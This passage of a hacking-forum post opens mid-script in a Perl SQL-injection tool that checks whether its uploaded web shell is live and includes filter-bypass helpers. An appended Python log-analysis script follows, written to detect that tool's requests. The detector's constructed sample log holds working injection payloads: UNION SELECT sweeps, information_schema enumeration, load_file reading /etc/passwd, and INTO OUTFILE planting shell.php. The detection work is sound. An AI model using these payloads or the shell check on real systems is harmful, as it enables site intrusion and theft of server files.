$code1 = toma("http://".$auth."/".$path2."/"."shell.php");
if ($code1=~/Mini Shell By Doddy/ig) {
print "[shell up] : http://".$auth."/".$path2."/"."shell.php"."\a\a";
savefile($save.".txt","[shell up] : http://".$auth."/".$path2."/"."shell.php");
} else {
print "[shell] : Not Found\n";
}
}
}
}

sub encode {
my $string = $_[0];
$hex = '0x';
for (split //,$string) {
$hex .= sprintf "%x", ord;
}
return $hex;
}

sub decode {
$_[0] =~ s/^0x//;
$encode = join q[], map { chr hex } $_[0] =~ /../g;
return $encode;
}

sub bypass {
if ($_[0] eq "/*") { return ("/**/","/**/"); }
elsif ($_[0] eq "%20") { return ("%20","%00"); }
else {return ("+","--");}}

sub ascii {
return join ',',unpack "U*",$_[0];
}

sub ascii_de {
$_[0] = join q[], map { chr } split q[,],$_[0];
return $_[0];
}


sub finish {
&copyright;
<STDIN>;
exit(1);
}

sub installer {
unless (-d "/logs/webs") {
mkdir("logs/",777);
mkdir("logs/webs/",777);
}
}

sub copyright {
print "\n\n\n\n(C) Doddy Hackman 2010\n\n";
}

sub toma {
return $nave->get($_[0])->content;
}

sub savefile {
open (SAVE,">>logs/webs/".$_[0]);
print SAVE $_[1]."\n";
close SAVE;
}

sub finish {
print "\n\n\n(C) Doddy Hackman 2010\n\n";
<STDIN>;
exit(1);
}


# The End ?



« Last modified: 1 December 2011, 22:18 by Doddy »
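A defender-side counterpart, added here and not part of BigBear's post or the k0bra script: every probe the script builds leaves a recognisable trace in a web server's access log (the 1=0 / 1=1 pair, UNION SELECT with char()-encoded RATSXPDOWN/ERTOR854/k0bra markers, information_schema lookups, load_file() with a hex-encoded path, INTO OUTFILE, and the fixed User-Agent string). The script below decodes char() and 0x literals back to clear text and flags requests on those signatures; the log lines, addresses and paths are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# User-Agent the k0bra script sets (note the missing space before "Firefox").
UA_SIGNATURE = "Gecko/20080201Firefox/2.0.0.12"
K0BRA_UA = ("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) "
            "Gecko/20080201Firefox/2.0.0.12")

# Constructed sample access-log lines (not from the page). They mimic the
# request shapes the script above builds: the 1=0 / 1=1 pair, the UNION
# SELECT column sweep with char()-encoded markers, the information_schema
# row count, load_file() with a hex-encoded path, and INTO OUTFILE.
SAMPLE_LOG = f'''
10.0.0.5 - - [01/Dec/2011:22:14:01 +0100] "GET /news.php?id=5 HTTP/1.1" 200 2190 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Dec/2011:22:14:03 +0100] "GET /news.php?id=5+and+1=0-- HTTP/1.1" 200 1840 "-" "{K0BRA_UA}"
10.0.0.9 - - [01/Dec/2011:22:14:03 +0100] "GET /news.php?id=5+and+1=1-- HTTP/1.1" 200 2190 "-" "{K0BRA_UA}"
10.0.0.9 - - [01/Dec/2011:22:14:04 +0100] "GET /news.php?id=51+and+1=0+union+select+char(82,65,84,83,88,80,68,79,87,78,49,82,65,84,83,88,80,68,79,87,78),char(82,65,84,83,88,80,68,79,87,78,50,82,65,84,83,88,80,68,79,87,78)-- HTTP/1.1" 200 2210 "-" "{K0BRA_UA}"
10.0.0.9 - - [01/Dec/2011:22:14:05 +0100] "GET /news.php?id=-1+union+select+unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))+from+information_schema.tables-- HTTP/1.1" 200 2205 "-" "{K0BRA_UA}"
10.0.0.9 - - [01/Dec/2011:22:14:06 +0100] "GET /news.php?id=-1+union+select+unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))-- HTTP/1.1" 200 3310 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Dec/2011:22:14:08 +0100] "GET /news.php?id=-1+union+select+0x6b30627261+into+outfile+'/var/www/shell.php'-- HTTP/1.1" 500 512 "-" "Mozilla/5.0"
'''

# Combined log format: ip ident user [ts] "METHOD url proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')
CHAR_RE = re.compile(r'\bchar\(([\d,\s]+)\)', re.I)
HEX_RE = re.compile(r'\b0x([0-9a-f]{2,})\b', re.I)

# [\s/*]+ between keywords also covers the /**/ and %20 "bypass" separators.
SIGNATURES = [
    ("union-select", re.compile(r'\bunion\b[\s/*]+\bselect\b', re.I)),
    ("boolean-probe", re.compile(r'\band\b[\s/*]+1\s*=\s*[01]\b', re.I)),
    ("information-schema", re.compile(r'\binformation_schema\.(?:tables|columns|schemata)\b', re.I)),
    ("mysql-user", re.compile(r'\bmysql\.user\b', re.I)),
    ("load-file", re.compile(r'\bload_file\s*\(', re.I)),
    ("into-outfile", re.compile(r'\binto\b[\s/*]+\boutfile\b', re.I)),
    ("k0bra-marker", re.compile(r'RATSXPDOWN|ERTOR854|k0bra', re.I)),
]


def decode_literals(sql):
    """Replace char(n,n,...) and 0x.. literals with the text they encode, so
    the marker strings the script hides behind char()/hex show up in clear."""
    def char_sub(m):
        try:
            return "'" + "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip()) + "'"
        except (ValueError, OverflowError):   # not a valid code point list
            return m.group(0)

    def hex_sub(m):
        digits = m.group(1)
        if len(digits) % 2:                   # odd length: not a byte string
            return m.group(0)
        return "'" + bytes.fromhex(digits).decode("latin-1") + "'"

    return HEX_RE.sub(hex_sub, CHAR_RE.sub(char_sub, sql))


def analyze_request(url, ua=""):
    """Return the names of the signatures that fire on one request."""
    decoded = decode_literals(unquote_plus(url))
    hits = [name for name, rx in SIGNATURES if rx.search(decoded)]
    if UA_SIGNATURE in ua:
        hits.append("k0bra-user-agent")
    return hits


def scan_log(text):
    """Parse access-log lines; return (ip, url, hits) for flagged requests and
    a per-IP count, so the 1=0/1=1 pair and the column sweep stand out."""
    flagged, per_ip = [], {}
    for line in text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = analyze_request(m["url"], m["ua"])
        if hits:
            flagged.append((m["ip"], m["url"], hits))
            per_ip[m["ip"]] = per_ip.get(m["ip"], 0) + 1
    return flagged, per_ip


if __name__ == "__main__":
    found, counts = scan_log(SAMPLE_LOG)
    for ip, url, hits in found:
        print(f"{ip} {', '.join(hits)}\n    {decode_literals(unquote_plus(url))}")
    print("requests flagged per source:", counts)
```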
